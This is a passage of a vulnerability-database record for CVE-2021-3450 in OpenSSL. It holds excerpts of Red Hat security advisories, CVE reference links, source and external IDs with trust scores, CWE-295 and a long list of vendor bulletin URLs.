Set in the Global Body Instead of Command Line\n2055371 - Remove Check which enforces summary_interval must match logSyncInterval\n2055689 - [ibm]Operator storage PROGRESSING and DEGRADED is true during fresh install for ocp4.11\n2055894 - CCO mint mode will not work for Azure after sunsetting of Active Directory Graph API\n2056441 - AWS EFS CSI driver should use the trusted CA bundle when cluster proxy is configured\n2056479 - ovirt-csi-driver-node pods are crashing intermittently\n2056572 - reconcilePrecaching error: cannot list resource \"clusterserviceversions\" in API group \"operators.coreos.com\" at the cluster scope\"\n2056629 - [4.10] EFS CSI driver can\u0027t unmount volumes with \"wait: no child processes\"\n2056878 - (dummy bug) ovn-kubernetes ExternalTrafficPolicy still SNATs\n2056928 - Ingresscontroller LB scope change behaviour differs for different values of aws-load-balancer-internal annotation\n2056948 - post 1.23 rebase: regression in service-load balancer reliability\n2057438 - Service Level Agreement (SLA) always show \u0027Unknown\u0027\n2057721 - Fix Proxy support in RHACM 2.4.2\n2057724 - Image creation fails when NMstateConfig CR is empty\n2058641 - [4.10] Pod density test causing problems when using kube-burner\n2059761 - 4.9.23-s390x-machine-os-content manifest invalid when mirroring content for disconnected install\n2060610 - Broken access to public images: Unable to connect to the server: no basic auth credentials\n2060956 - service domain can\u0027t be resolved when networkpolicy is used in OCP 4.10-rc\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3577\nhttps://access.redhat.com/security/cve/CVE-2016-10228\nhttps://access.redhat.com/security/cve/CVE-2017-14502\nhttps://access.redhat.com/security/cve/CVE-2018-20843\nhttps://access.redhat.com/security/cve/CVE-2018-1000858\nhttps://access.redhat.com/security/cve/CVE-2019-8625\nhttps://access.redhat.com/security/cve/CVE-2019-8710\nhttps://access.redhat.com/security/cve/CVE-2019-8720\nhttps://access.redhat.com/security/cve/CVE-2019-8743\nhttps://access.redhat.com/security/cve/CVE-2019-8764\nhttps://access.redhat.com/security/cve/CVE-2019-8766\nhttps://access.redhat.com/security/cve/CVE-2019-8769\nhttps://access.redhat.com/security/cve/CVE-2019-8771\nhttps://access.redhat.com/security/cve/CVE-2019-8782\nhttps://access.redhat.com/security/cve/CVE-2019-8783\nhttps://access.redhat.com/security/cve/CVE-2019-8808\nhttps://access.redhat.com/security/cve/CVE-2019-8811\nhttps://access.redhat.com/security/cve/CVE-2019-8812\nhttps://access.redhat.com/security/cve/CVE-2019-8813\nhttps://access.redhat.com/security/cve/CVE-2019-8814\nhttps://access.redhat.com/security/cve/CVE-2019-8815\nhttps://access.redhat.com/security/cve/CVE-2019-8816\nhttps://access.redhat.com/security/cve/CVE-2019-8819\nhttps://access.redhat.com/security/cve/CVE-2019-8820\nhttps://access.redhat.com/security/cve/CVE-2019-8823\nhttps://access.redhat.com/security/cve/CVE-2019-8835\nhttps://access.redhat.com/security/cve/CVE-2019-8844\nhttps://access.redhat.com/security/cve/CVE-2019-8846\nhttps://access.redhat.com/security/cve/CVE-2019-9169\nhttps://access.redhat.com/security/cve/CVE-2019-13050\nhttps://access.redhat.com/security/cve/CVE-2019-13627\nhttps://access.redhat.com/security/cve/CVE-2019-14889\nhttps://access.redhat.com/security/cve/CVE-2019-15903\nhttps://access.redhat.com/security/cve/CVE-2019-19906\nhttps://access.redhat.com/security/cve/CVE-2019-20454\nhttps://access.redhat.com/security/cve/CVE-2019-20807\nhttps://access.redhat.com/security/cve/CVE-2019-25013\nhttps://access.redhat.com/security/cve/CVE-2020-1730\nhttps://access.redhat.com/security/cve/CVE-2020-3862\nhttps://access.redhat.com/security/cve/CVE-2020-3864\nhttps://access.redhat.com/security/cve/CVE-2020-3865\nhttps://access.redhat.com/security/cve/CVE-2020-3867\nhttps://access.redhat.com/security/cve/CVE-2020-3868\nhttps://access.redhat.com/security/cve/CVE-2020-3885\nhttps://access.redhat.com/security/cve/CVE-2020-3894\nhttps://access.redhat.com/security/cve/CVE-2020-3895\nhttps://access.redhat.com/security/cve/CVE-2020-3897\nhttps://access.redhat.com/security/cve/CVE-2020-3899\nhttps://access.redhat.com/security/cve/CVE-2020-3900\nhttps://access.redhat.com/security/cve/CVE-2020-3901\nhttps://access.redhat.com/security/cve/CVE-2020-3902\nhttps://access.redhat.com/security/cve/CVE-2020-8927\nhttps://access.redhat.com/security/cve/CVE-2020-9802\nhttps://access.redhat.com/security/cve/CVE-2020-9803\nhttps://access.redhat.com/security/cve/CVE-2020-9805\nhttps://access.redhat.com/security/cve/CVE-2020-9806\nhttps://access.redhat.com/security/cve/CVE-2020-9807\nhttps://access.redhat.com/security/cve/CVE-2020-9843\nhttps://access.redhat.com/security/cve/CVE-2020-9850\nhttps://access.redhat.com/security/cve/CVE-2020-9862\nhttps://access.redhat.com/security/cve/CVE-2020-9893\nhttps://access.redhat.com/security/cve/CVE-2020-9894\nhttps://access.redhat.com/security/cve/CVE-2020-9895\nhttps://access.redhat.com/security/cve/CVE-2020-9915\nhttps://access.redhat.com/security/cve/CVE-2020-9925\nhttps://access.redhat.com/security/cve/CVE-2020-9952\nhttps://access.redhat.com/security/cve/CVE-2020-10018\nhttps://access.redhat.com/security/cve/CVE-2020-11793\nhttps://access.redhat.com/security/cve/CVE-2020-13434\nhttps://access.redhat.com/security/cve/CVE-2020-14391\nhttps://access.redhat.com/security/cve/CVE-2020-15358\nhttps://access.redhat.com/security/cve/CVE-2020-15503\nhttps://access.redhat.com/security/cve/CVE-2020-25660\nhttps://access.redhat.com/security/cve/CVE-2020-25677\nhttps://access.redhat.com/security/cve/CVE-2020-27618\nhttps://access.redhat.com/security/cve/CVE-2020-27781\nhttps://access.redhat.com/security/cve/CVE-2020-29361\nhttps://access.redhat.com/security/cve/CVE-2020-29362\nhttps://access.redhat.com/security/cve/CVE-2020-29363\nhttps://access.redhat.com/security/cve/CVE-2021-3121\nhttps://access.redhat.com/security/cve/CVE-2021-3326\nhttps://access.redhat.com/security/cve/CVE-2021-3449\nhttps://access.redhat.com/security/cve/CVE-2021-3450\nhttps://access.redhat.com/security/cve/CVE-2021-3516\nhttps://access.redhat.com/security/cve/CVE-2021-3517\nhttps://access.redhat.com/security/cve/CVE-2021-3518\nhttps://access.redhat.com/security/cve/CVE-2021-3520\nhttps://access.redhat.com/security/cve/CVE-2021-3521\nhttps://access.redhat.com/security/cve/CVE-2021-3537\nhttps://access.redhat.com/security/cve/CVE-2021-3541\nhttps://access.redhat.com/security/cve/CVE-2021-3733\nhttps://access.redhat.com/security/cve/CVE-2021-3749\nhttps://access.redhat.com/security/cve/CVE-2021-20305\nhttps://access.redhat.com/security/cve/CVE-2021-21684\nhttps://access.redhat.com/security/cve/CVE-2021-22946\nhttps://access.redhat.com/security/cve/CVE-2021-22947\nhttps://access.redhat.com/security/cve/CVE-2021-25215\nhttps://access.redhat.com/security/cve/CVE-2021-27218\nhttps://access.redhat.com/security/cve/CVE-2021-30666\nhttps://access.redhat.com/security/cve/CVE-2021-30761\nhttps://access.redhat.com/security/cve/CVE-2021-30762\nhttps://access.redhat.com/security/cve/CVE-2021-33928\nhttps://access.redhat.com/security/cve/CVE-2021-33929\nhttps://access.redhat.com/security/cve/CVE-2021-33930\nhttps://access.redhat.com/security/cve/CVE-2021-33938\nhttps://access.redhat.com/security/cve/CVE-2021-36222\nhttps://access.redhat.com/security/cve/CVE-2021-37750\nhttps://access.redhat.com/security/cve/CVE-2021-39226\nhttps://access.redhat.com/security/cve/CVE-2021-41190\nhttps://access.redhat.com/security/cve/CVE-2021-43813\nhttps://access.redhat.com/security/cve/CVE-2021-44716\nhttps://access.redhat.com/security/cve/CVE-2021-44717\nhttps://access.redhat.com/security/cve/CVE-2022-0532\nhttps://access.redhat.com/security/cve/CVE-2022-21673\nhttps://access.redhat.com/security/cve/CVE-2022-24407\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYipqONzjgjWX9erEAQjQcBAAgWTjA6Q2NgqfVf63ZpJF1jPurZLPqxDL\n0in/5+/wqWaiQ6yk7wM3YBZgviyKnAMCVdrLsaR7R77BvfJcTE3W/fzogxpp6Rne\neGT1PTgQRecrSIn+WG4gGSteavTULWOIoPvUiNpiy3Y7fFgjFdah+Nyx3Xd+xehM\nCEswylOd6Hr03KZ1tS3XL3kGL2botha48Yls7FzDFbNcy6TBAuycmQZifKu8mHaF\naDAupVJinDnnVgACeS6CnZTAD+Vrx5W7NIisteXv4x5Hy+jBIUHr8Yge3oxYoFnC\nY/XmuOw2KilLZuqFe+KHig45qT+FmNU8E1egcGpNWvmS8hGZfiG1jEQAqDPbZHxp\nsQAQZLQyz3TvXa29vp4QcsUuMxndIOi+QaK75JmqE06MqMIlFDYpr6eQOIgIZvFO\nRDZU/qvBjh56ypInoqInBf8KOQMy6eO+r6nFbMGcAfucXmz0EVcSP1oFHAoA1nWN\nrs1Qz/SO4CvdPERxcr1MLuBLggZ6iqGmHKk5IN0SwcndBHaVJ3j/LBv9m7wBYVry\nbSvojBDYx5ricbTwB5sGzu7oH5yVl813FA9cjkFpEhBiMtTfI+DKC8ssoRYNHd5Z\n7gLW6KWPUIDuCIiiioPZAJMyvJ0IMrNDoQ0lhqPeV7PFdlRhT95M/DagUZOpPVuT\nb5PUYUBIZLc=\n=GUDA\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve\n1918761 - CVE-2021-3115 golang: cmd/go: packages using cgo can cause arbitrary code execution at build time\n1935897 - Release of OpenShift Serverless Serving 1.14.0\n1935898 - Release of OpenShift Serverless Eventing 1.14.0\n\n5. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release adds the new Apache HTTP Server 2.4.37 Service Pack 7 packages\nthat are part of the JBoss Core Services offering. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link for the\nupdate. You must be logged in to download the update",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-3450"
},
{
"db": "VULHUB",
"id": "VHN-388430"
},
{
"db": "PACKETSTORM",
"id": "169659"
},
{
"db": "PACKETSTORM",
"id": "162699"
},
{
"db": "PACKETSTORM",
"id": "163209"
},
{
"db": "PACKETSTORM",
"id": "163257"
},
{
"db": "PACKETSTORM",
"id": "162172"
},
{
"db": "PACKETSTORM",
"id": "162151"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "162307"
},
{
"db": "PACKETSTORM",
"id": "162197"
}
],
"trust": 1.8
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-3450",
"trust": 2.6
},
{
"db": "SIEMENS",
"id": "SSA-389290",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/03/28/3",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/03/27/2",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/03/28/4",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/03/27/1",
"trust": 1.7
},
{
"db": "TENABLE",
"id": "TNS-2021-05",
"trust": 1.7
},
{
"db": "TENABLE",
"id": "TNS-2021-09",
"trust": 1.7
},
{
"db": "TENABLE",
"id": "TNS-2021-08",
"trust": 1.7
},
{
"db": "PULSESECURE",
"id": "SA44845",
"trust": 1.7
},
{
"db": "MCAFEE",
"id": "SB10356",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "162151",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "163257",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162172",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162307",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162699",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162337",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162196",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162383",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162013",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162041",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.1406",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2160",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1191",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2259.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1618",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3141",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1378",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4083",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1065",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2228",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1445",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1127",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2408",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1293",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1727",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1225",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1025",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2657",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1082.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1075",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1757",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4058",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021051226",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021050609",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022041940",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041615",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021101938",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021062703",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021062315",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021042114",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021101261",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072056",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021071904",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060315",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072765",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021042502",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021052216",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021050615",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031104",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022011038",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "161984",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "162197",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "162189",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162201",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162200",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162183",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-388430",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169659",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163209",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166279",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-388430"
},
{
"db": "PACKETSTORM",
"id": "169659"
},
{
"db": "PACKETSTORM",
"id": "162699"
},
{
"db": "PACKETSTORM",
"id": "163209"
},
{
"db": "PACKETSTORM",
"id": "163257"
},
{
"db": "PACKETSTORM",
"id": "162172"
},
{
"db": "PACKETSTORM",
"id": "162151"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "162307"
},
{
"db": "PACKETSTORM",
"id": "162197"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
},
{
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"id": "VAR-202103-1463",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-388430"
}
],
"trust": 0.43938632
},
"last_update_date": "2026-03-09T20:22:49.581000Z",
"patch": {
"_id": null,
"data": [
{
"title": "OpenSSL Repair measures for trust management problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146028"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-295",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-388430"
},
{
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.3,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-openssl-2021-ghy28djd"
},
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.8,
"url": "https://www.openssl.org/news/secadv/20210325.txt"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
},
{
"trust": 1.7,
"url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44845"
},
{
"trust": 1.7,
"url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2021-0013"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20210326-0006/"
},
{
"trust": 1.7,
"url": "https://www.tenable.com/security/tns-2021-05"
},
{
"trust": 1.7,
"url": "https://www.tenable.com/security/tns-2021-08"
},
{
"trust": 1.7,
"url": "https://www.tenable.com/security/tns-2021-09"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/202103-03"
},
{
"trust": 1.7,
"url": "https://mta.openssl.org/pipermail/openssl-announce/2021-march/000198.html"
},
{
"trust": 1.7,
"url": "https://security.freebsd.org/advisories/freebsd-sa-21:07.openssl.asc"
},
{
"trust": 1.7,
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/03/27/1"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/03/27/2"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/03/28/3"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/03/28/4"
},
{
"trust": 1.6,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10356"
},
{
"trust": 1.0,
"url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ccbfllvqvilivgzmbjl3ixzgkwqisynp/"
},
{
"trust": 0.8,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-3449"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-3450"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.7,
"url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ccbfllvqvilivgzmbjl3ixzgkwqisynp/"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3449"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3450"
},
{
"trust": 0.6,
"url": "https://www.debian.org/security/2021/dsa-4875"
},
{
"trust": 0.6,
"url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-are-affected-by-vulnerabilities-in-node-js-cve-2021-3450-cve-2021-3449-3/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-update-available-for-openssl-vulnerabilities-affecting-ibm-watson-speech-services-1-2-1/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6486347"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021052216"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-cve-2021-3449-cve-2021-3450-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2657"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1127"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1445"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1727"
},
{
"trust": 0.6,
"url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-3450"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-system-systems-are-affected-by-vulnerabilities-in-openssl/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1406"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162172/red-hat-security-advisory-2021-1189-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-xstream-java-openssl-websphere-application-server-liberty-and-node-js-affect-ibm-spectrum-control/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-for-ibm-i-is-affected-by-cve-2021-3449-and-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1378"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162041/gentoo-linux-security-advisory-202103-03.html"
},
{
"trust": 0.6,
"url": "https://www.oracle.com/security-alerts/cpujul2021.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1293"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4083"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6520674"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1618"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2228"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-cloud-pak-for-security-has-several-security-vulnerabilities-addressed-in-the-latest-version/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162307/red-hat-security-advisory-2021-1338-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162699/red-hat-security-advisory-2021-2041-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6520474"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072056"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1065"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021042502"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162013/red-hat-security-advisory-2021-1024-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-cve-2021-3449-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-may-affect-ibm-workload-scheduler/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6523070"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4058"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161984/ubuntu-security-notice-usn-4891-1.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-app-connect-enterprise-certified-container-may-be-affected-by-openssl-vulnerabilities-cve-2021-3449-and-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-affects-ibm-infosphere-information-server/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2259.2"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-are-affected-by-vulnerabilities-in-node-js-cve-2021-3450-cve-2021-3449-2/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163257/red-hat-security-advisory-2021-2130-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-tivoli-netcool-system-service-monitors-application-service-monitors/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021051226"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072765"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1225"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041615"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021071904"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1075"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1082.2"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021042114"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021101938"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-for-hpe-nonstop-server-is-affected-by-openssl-vulnerabilities-cve-2021-3449-and-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1191"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021050609"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2160"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1025"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162151/red-hat-security-advisory-2021-1168-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-integration-is-vulnerable-to-openssl-vulnerabilities-cve-2021-3449-and-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021101261"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021062703"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162196/red-hat-security-advisory-2021-1199-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2408"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022041940"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1757"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060315"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162337/red-hat-security-advisory-2021-1369-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022011038"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021062315"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162383/red-hat-security-advisory-2021-1448-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-vulnerabilities-affect-ibm-sterling-connectexpress-for-unix-cve-2021-3449-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021050615"
},
{
"trust": 0.6,
